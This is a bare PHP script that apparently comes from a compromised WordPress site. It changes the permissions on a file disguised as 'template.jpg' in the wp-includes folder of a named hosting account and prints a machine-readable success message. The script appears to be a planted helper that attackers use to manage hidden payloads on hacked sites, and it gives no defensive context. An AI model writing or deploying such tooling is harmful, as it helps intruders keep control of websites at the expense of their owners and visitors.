<?php echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=Windows-1251'></head><body>";ob_start();if(chmod('/home/pati454t/public_html/wp-includes/template.jpg', 0644)) echo "chmoded";$c = ob_get_clean();print("<textarea>$c</textarea>");echo "Result:OK"; echo "</body></html>"; die;